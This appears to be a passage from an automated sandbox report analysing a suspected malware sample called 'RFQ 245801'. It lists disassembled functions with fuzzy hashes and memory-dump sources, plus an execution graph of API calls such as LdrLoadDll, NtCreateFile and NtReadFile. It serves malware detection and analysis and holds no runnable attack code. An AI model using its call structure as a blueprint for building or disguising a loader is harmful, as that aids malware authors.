                                                                                                                                                                                  • Instruction ID: e79c9cd02c918022c68431b2429886057c3196c5691f0ca257590b5f9efe6a2f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 37bdfe368ead80ed6dea472da5b74b96d3f88ed60734ffe6d2febaaabbad5d3e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F11E0B58002499FDB20CF9AD485BDEBBF8EB48324F14845AE558A7610C375A984CFA5
                                                                                                                                                                                  Function 0733A2E8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 0733A345
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                                  • Opcode ID: fb7919771b6a3ee5a843c73c1fb5715e4b16c35a9b94302c8b430ba947008d60
                                                                                                                                                                                  • Instruction ID: 2bdbbcee97efcf21b5f41df93532249dfc6e1e39c9561d64901ed8bd01f651e8
                                                                                                                                                                                  • Opcode Fuzzy Hash: fb7919771b6a3ee5a843c73c1fb5715e4b16c35a9b94302c8b430ba947008d60
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D11D3B58003499FDB20DF9AC445BDEFBF8EB48324F148419E558A7610C375A584CFA5
                                                                                                                                                                                  Function 00C9D06C Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743516172.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c9d000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2f937121273d50147e9c5de664df375d522a29aaf1ec0721cd62357307d7ab6a
                                                                                                                                                                                  • Instruction ID: 9c89fdf18a9f5d4f17d7c8dc45f6af9444cbad5b0d4c833a19c398b043fd5540
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f937121273d50147e9c5de664df375d522a29aaf1ec0721cd62357307d7ab6a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D1212872504240DFCF05DF14D9C8B2BBFA5FB98324F24C269E90A2B255C33AD856CBA1
                                                                                                                                                                                  Function 00CAD3D8 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b21f03d55893ed6736f5876da2ee00409db295af44d07cf19a7dd05e11931083
                                                                                                                                                                                  • Instruction ID: d4eb7d0ba2c7594baabd46641a829b9f2066d17c9a352f8e6045148e9c32f842
                                                                                                                                                                                  • Opcode Fuzzy Hash: b21f03d55893ed6736f5876da2ee00409db295af44d07cf19a7dd05e11931083
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A212671504205DFDB04DF14D5C4B2ABBA5FB89318F20C66DE90B4B756C33AE846CB62
                                                                                                                                                                                  Function 00CAD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a8393099674c49fb96a41f8784a5ccef1aa30554b99bead597d4100bc0bd9717
                                                                                                                                                                                  • Instruction ID: 56733ca087c5bc225860a6b21fbba5bffba9d26a8b55264f6c3aa5e1912d0bd7
                                                                                                                                                                                  • Opcode Fuzzy Hash: a8393099674c49fb96a41f8784a5ccef1aa30554b99bead597d4100bc0bd9717
                                                                                                                                                                                  • Instruction Fuzzy Hash: C8210471604205DFCB14DF24D9C4B26BFA5FB89318F20C56DE84B4B696C33AD847CA61
                                                                                                                                                                                  Function 00CAD2F0 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 11a86756e3ee7402a1fa13d4084f9b605714aa79aca6a4456d21e5418c324874
                                                                                                                                                                                  • Instruction ID: 4b291ba858381d667e805d901afabc9080601440d8a929bd5fe760f6da51490f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 11a86756e3ee7402a1fa13d4084f9b605714aa79aca6a4456d21e5418c324874
                                                                                                                                                                                  • Instruction Fuzzy Hash: 462104B1604205DFCF04DF24D9C0B26BBB5FB85718F20C5ADE84B4B666C33AD846CA62
                                                                                                                                                                                  Function 00CAD005 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b2df24d6a3c71b0c7a2816efabcf6ff5d07f18e2156047a8e5bd0f159139eba3
                                                                                                                                                                                  • Instruction ID: 2ccfcf7784d3deccbb47de03c7fbbb030f8cec2ab394e471c542e5530f887bd8
                                                                                                                                                                                  • Opcode Fuzzy Hash: b2df24d6a3c71b0c7a2816efabcf6ff5d07f18e2156047a8e5bd0f159139eba3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 382153755093808FDB12CF24D594715BF71EB46318F28C5DAD84A8F6A7C33A990ACB62
                                                                                                                                                                                  Function 00C9D067 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743516172.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c9d000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                                                                                                  • Instruction ID: 659d2d406c6c6d799ab267ad86824b43770dd8ef231b5a5c7d6544849dff00ca
                                                                                                                                                                                  • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                                                                                                  • Instruction Fuzzy Hash: F4219D76504284DFDF06CF10D9C4B1ABF72FB98324F24C6A9D94A1B256C33AD926CB91
                                                                                                                                                                                  Function 00CAD2EB Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                  • Instruction ID: f73a383bc0a94d00f2892912f794ebbd331aba895ec90493f04b47c793c77d93
                                                                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                  • Instruction Fuzzy Hash: E311DD75504284CFCB01CF14D5C4B15BFB1FB85318F24C6AAD84A4B666C33AD80ACB62
                                                                                                                                                                                  Function 00CAD3D3 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                  • Instruction ID: 6c8bb4da928ae3ef260ef6e3169ccd74d1c16b96b97c13441bdcefe5d3264c1b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                  • Instruction Fuzzy Hash: D811DD75504280CFDB01CF10D5C4B15BFB1FB89318F24C6AAD84A4B666C33AE84ACB61
                                                                                                                                                                                  Function 00C9D941 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743516172.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c9d000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9a2e741e98582be5aebfecd89c957bdacd8b604e76ac3546b56f8831fe8237cc
                                                                                                                                                                                  • Instruction ID: 3e190c1d55e6ee99160582daa3bc01d8a11561830c50048013389a3a1af484d2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a2e741e98582be5aebfecd89c957bdacd8b604e76ac3546b56f8831fe8237cc
                                                                                                                                                                                  • Instruction Fuzzy Hash: BE012B310083449AEF10AB16CD88767FFD8EF51324F18C56AEC5A6E286CA39DC40C6B2
                                                                                                                                                                                  Function 00C9D940 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743516172.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c9d000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4e0d41381de62282c4224f15820faccfcb1603a92d817935512f0c225ca08415
                                                                                                                                                                                  • Instruction ID: 1a855b08d0c67891a564888efb030c734ed6252d337eb24ce959ea0ae0576fd4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e0d41381de62282c4224f15820faccfcb1603a92d817935512f0c225ca08415
                                                                                                                                                                                  • Instruction Fuzzy Hash: 68F0C2710083449BEB109B16C888B62FFA8EB91324F18C45AED495E286C2799840CAB1

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 029EE828 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745402178.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_29e0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 17f5a0857478b57515c2ecde844a657e7c6ffe4000ac3e21a8995588ee339e11
                                                                                                                                                                                  • Instruction ID: 46f15a582364701f85ec9d2ed9fcb16dbcd18d73c8d6a945f57db5404942d4b7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 17f5a0857478b57515c2ecde844a657e7c6ffe4000ac3e21a8995588ee339e11
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8512E6F1D80765CAD350CF25E84829A7BA0BB4032EF504F09D2751B2D9DBB8916BCF64
                                                                                                                                                                                  Function 07332620 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 73f6587b4a82efaf446f22156550b2d759f1956015d2fa88ee2f7c21f6559175
                                                                                                                                                                                  • Instruction ID: 3f55d69ff716201688f976324026b2cf812823b80a2e63002cab62cc0e78bfc2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 73f6587b4a82efaf446f22156550b2d759f1956015d2fa88ee2f7c21f6559175
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71E10DB4E141198FDB14DFA9C5809AEFBF2FF89304F249159D418AB35ADB31A941CFA0
                                                                                                                                                                                  Function 07332A58 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c2d6c07610dc208dc7b603e7e5e70999505f1df3d2a990aaec5abe640982fa5c
                                                                                                                                                                                  • Instruction ID: 9c0ebecff7ffb234bbb13252748362f3ebc4befea3926a05bf89d693b37db66e
                                                                                                                                                                                  • Opcode Fuzzy Hash: c2d6c07610dc208dc7b603e7e5e70999505f1df3d2a990aaec5abe640982fa5c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BE10DB4E041198FDB14DFA9C5809AEFBF2FF89304F249159E418AB359DB31A941CFA0
                                                                                                                                                                                  Function 07334100 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4e3273e2aa49e5453581f7fcd4843a76084aa1b4c132c158db418c61a8c6299e
                                                                                                                                                                                  • Instruction ID: a3a9044712e156dd6220995472e156a59bf14c202bc26fa03120c3f676a80ded
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e3273e2aa49e5453581f7fcd4843a76084aa1b4c132c158db418c61a8c6299e
                                                                                                                                                                                  • Instruction Fuzzy Hash: AAE10BB4E041598FDB14DF99C5809AEFBF2BF89304F248169D418AB35ADB31A941CFA1
                                                                                                                                                                                  Function 073321E8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: aace6474d39920c5fea4f9b2c9d1a7733ec365f4d586d04fbc8a1155769f72e8
                                                                                                                                                                                  • Instruction ID: 303f86493e7fae417ea2e34b5b2ab1878a6a39a338e5a37fff49b8d619bd9d86
                                                                                                                                                                                  • Opcode Fuzzy Hash: aace6474d39920c5fea4f9b2c9d1a7733ec365f4d586d04fbc8a1155769f72e8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 13E1ECB4E041198FDB14DFA9C5809AEFBF2FF49304F249169E418AB359DB31A941CFA1
                                                                                                                                                                                  Function 073349D8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 29a492d1e0348ee19d968ed442cf20b56ad549e4e59a063c17ffe2f9eedf6717
                                                                                                                                                                                  • Instruction ID: 831708b98cb9f38086a6d3365939d1fe29de890f7d284c90cdefc5c91d18b512
                                                                                                                                                                                  • Opcode Fuzzy Hash: 29a492d1e0348ee19d968ed442cf20b56ad549e4e59a063c17ffe2f9eedf6717
                                                                                                                                                                                  • Instruction Fuzzy Hash: AEE1FCB4E041598FDB14DFA9C5809AEFBF2FF89304F249159D418A735ADB31A941CFA0
                                                                                                                                                                                  Function 07332A48 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a8f13644310ec4f610069a28bb015e9727eb73c3c4547d7b9f24521c6f4d317c
                                                                                                                                                                                  • Instruction ID: 9f00b42ccd98aedfd6ba439f202e6b5353fec66bf4f4ca6e3680b380fdc771d0
                                                                                                                                                                                  • Opcode Fuzzy Hash: a8f13644310ec4f610069a28bb015e9727eb73c3c4547d7b9f24521c6f4d317c
                                                                                                                                                                                  • Instruction Fuzzy Hash: CF912DB4E002198FDB14DFA9C984AAEFBF2FF89304F148169D419AB315DB31A941CF90
                                                                                                                                                                                  Function 073349C7 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8fdf9ae09f35a22355a719eba99adce806002ffbf53d223ce788b1b6b3199d61
                                                                                                                                                                                  • Instruction ID: dd1cc3bcf20b0002a5a24ee3e514d944b4c17c4300ee1e752a79329bfb7be1af
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fdf9ae09f35a22355a719eba99adce806002ffbf53d223ce788b1b6b3199d61
                                                                                                                                                                                  • Instruction Fuzzy Hash: 65510BB0E042598FDB14DFA9C5805AEFBF2FF89304F24816AD418A7356DB319941CFA5

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:1.4%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                                                  Signature Coverage:6.2%
                                                                                                                                                                                  Total number of Nodes:549
                                                                                                                                                                                  Total number of Limit Nodes:66
                                                                                                                                                                                  execution_graph 97270 41f0e0 97271 41f0eb 97270->97271 97273 41b940 97270->97273 97274 41b966 97273->97274 97281 409d40 97274->97281 97276 41b972 97277 41b993 97276->97277 97289 40c1c0 97276->97289 97277->97271 97279 41b985 97325 41a680 97279->97325 97328 409c90 97281->97328 97283 409d4d 97284 409d54 97283->97284 97340 409c30 97283->97340 97284->97276 97290 40c1e5 97289->97290 97748 40b1c0 97290->97748 97292 40c23c 97752 40ae40 97292->97752 97294 40c4b3 97294->97279 97295 40c262 97295->97294 97761 4143a0 97295->97761 97297 40c2a7 97297->97294 97764 408a60 97297->97764 97299 40c2eb 97299->97294 97771 41a4d0 97299->97771 97303 40c341 97304 40c348 97303->97304 97783 419fe0 97303->97783 97306 41bd90 2 API calls 97304->97306 97308 40c355 97306->97308 97308->97279 97309 40c392 97310 41bd90 2 API calls 97309->97310 97311 40c399 97310->97311 97311->97279 97312 40c3a2 97313 40f4a0 3 API calls 97312->97313 97314 40c416 97313->97314 97314->97304 97315 40c421 97314->97315 97316 41bd90 2 API calls 97315->97316 97317 40c445 97316->97317 97788 41a030 97317->97788 97320 419fe0 2 API calls 97321 40c480 97320->97321 97321->97294 97793 419df0 97321->97793 97324 41a680 2 API calls 97324->97294 97326 41af30 LdrLoadDll 97325->97326 97327 41a69f ExitProcess 97326->97327 97327->97277 97329 409ca3 97328->97329 97379 418b90 LdrLoadDll 97328->97379 97359 418a40 97329->97359 97332 409cb6 97332->97283 97333 409cac 97333->97332 97362 41b280 97333->97362 97335 409cf3 97335->97332 97373 409ab0 97335->97373 97337 409d13 97380 409620 LdrLoadDll 97337->97380 97339 409d25 97339->97283 97341 409c4a 97340->97341 97342 41b570 LdrLoadDll 97340->97342 97723 41b570 97341->97723 97342->97341 97345 41b570 LdrLoadDll 97346 409c71 97345->97346 97347 40f180 97346->97347 97348 40f199 97347->97348 97731 40b040 97348->97731 97350 40f1ac 97351 40f1bb 97350->97351 97743 41a1b0 97350->97743 97353 409d65 97351->97353 97735 41a7a0 97351->97735 97353->97276 97355 40f1d2 97358 40f1fd 97355->97358 97738 41a230 97355->97738 97356 41a460 2 API calls 97356->97353 97358->97356 97381 41a5d0 97359->97381 97363 41b299 97362->97363 97394 414a50 97363->97394 97365 41b2b1 97366 41b2ba 97365->97366 97433 41b0c0 97365->97433 97366->97335 97368 41b2ce 97368->97366 97451 419ed0 97368->97451 97701 407ea0 97373->97701 97375 409ad1 97375->97337 97376 409aca 97376->97375 97714 408160 97376->97714 97379->97329 97380->97339 97384 41af30 97381->97384 97383 418a55 97383->97333 97385 41af40 97384->97385 97386 41af62 97384->97386 97388 414e50 97385->97388 97386->97383 97389 414e5e 97388->97389 97390 414e6a 97388->97390 97389->97390 97393 4152d0 LdrLoadDll 97389->97393 97390->97386 97392 414fbc 97392->97386 97393->97392 97395 414d85 97394->97395 97396 414a64 97394->97396 97395->97365 97396->97395 97459 419c20 97396->97459 97399 414b90 97462 41a330 97399->97462 97400 414b73 97519 41a430 LdrLoadDll 97400->97519 97403 414b7d 97403->97365 97404 414bb7 97405 41bd90 2 API calls 97404->97405 97407 414bc3 97405->97407 97406 414d49 97409 41a460 2 API calls 97406->97409 97407->97403 97407->97406 97408 414d5f 97407->97408 97413 414c52 97407->97413 97528 414790 LdrLoadDll NtReadFile NtClose 97408->97528 97410 414d50 97409->97410 97410->97365 97412 414d72 97412->97365 97414 414cb9 97413->97414 97416 414c61 97413->97416 97414->97406 97415 414ccc 97414->97415 97521 41a2b0 97415->97521 97418 414c66 97416->97418 97419 414c7a 97416->97419 97520 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97418->97520 97422 414c97 97419->97422 97423 414c7f 97419->97423 97422->97410 97477 414410 97422->97477 97465 4146f0 97423->97465 97425 414c70 97425->97365 97427 414d2c 97525 41a460 97427->97525 97428 414c8d 97428->97365 97431 414caf 97431->97365 97432 414d38 97432->97365 97434 41b0d1 97433->97434 97435 41b0e3 97434->97435 97546 41bd10 97434->97546 97435->97368 97437 41b104 97549 414070 97437->97549 97439 41b150 97439->97368 97440 41b127 97440->97439 97441 414070 3 API calls 97440->97441 97442 41b149 97441->97442 97442->97439 97574 415390 97442->97574 97444 41b1ea 97584 41ad40 97444->97584 97445 41b1da 97445->97444 97668 41aed0 LdrLoadDll 97445->97668 97448 41b218 97663 419e90 97448->97663 97452 419eec 97451->97452 97453 41af30 LdrLoadDll 97451->97453 97695 1762c0a 97452->97695 97453->97452 97454 419f07 97456 41bd90 97454->97456 97698 41a640 97456->97698 97458 41b329 97458->97335 97460 41af30 LdrLoadDll 97459->97460 97461 414b44 97460->97461 97461->97399 97461->97400 97461->97403 97463 41a34c NtCreateFile 97462->97463 97464 41af30 LdrLoadDll 97462->97464 97463->97404 97464->97463 97466 41470c 97465->97466 97467 41a2b0 LdrLoadDll 97466->97467 97468 41472d 97467->97468 97469 414734 97468->97469 97470 414748 97468->97470 97472 41a460 2 API calls 97469->97472 97471 41a460 2 API calls 97470->97471 97473 414751 97471->97473 97474 41473d 97472->97474 97529 41bfa0 LdrLoadDll RtlAllocateHeap 97473->97529 97474->97428 97476 41475c 97476->97428 97478 41445b 97477->97478 97479 41448e 97477->97479 97480 41a2b0 LdrLoadDll 97478->97480 97481 4145d9 97479->97481 97484 4144aa 97479->97484 97482 414476 97480->97482 97483 41a2b0 LdrLoadDll 97481->97483 97485 41a460 2 API calls 97482->97485 97489 4145f4 97483->97489 97486 41a2b0 LdrLoadDll 97484->97486 97487 41447f 97485->97487 97488 4144c5 97486->97488 97487->97431 97491 4144e1 97488->97491 97492 4144cc 97488->97492 97542 41a2f0 LdrLoadDll 97489->97542 97495 4144e6 97491->97495 97496 4144fc 97491->97496 97494 41a460 2 API calls 97492->97494 97493 41462e 97497 41a460 2 API calls 97493->97497 97498 4144d5 97494->97498 97499 41a460 2 API calls 97495->97499 97505 414501 97496->97505 97530 41bf60 97496->97530 97500 414639 97497->97500 97498->97431 97501 4144ef 97499->97501 97500->97431 97501->97431 97502 414513 97502->97431 97505->97502 97533 41a3e0 97505->97533 97506 414567 97507 41457e 97506->97507 97541 41a270 LdrLoadDll 97506->97541 97509 414585 97507->97509 97510 41459a 97507->97510 97512 41a460 2 API calls 97509->97512 97511 41a460 2 API calls 97510->97511 97513 4145a3 97511->97513 97512->97502 97514 4145cf 97513->97514 97536 41bb60 97513->97536 97514->97431 97516 4145ba 97517 41bd90 2 API calls 97516->97517 97518 4145c3 97517->97518 97518->97431 97519->97403 97520->97425 97522 41af30 LdrLoadDll 97521->97522 97523 414d14 97522->97523 97524 41a2f0 LdrLoadDll 97523->97524 97524->97427 97526 41a47c NtClose 97525->97526 97527 41af30 LdrLoadDll 97525->97527 97526->97432 97527->97526 97528->97412 97529->97476 97543 41a600 97530->97543 97532 41bf78 97532->97505 97534 41a3fc NtReadFile 97533->97534 97535 41af30 LdrLoadDll 97533->97535 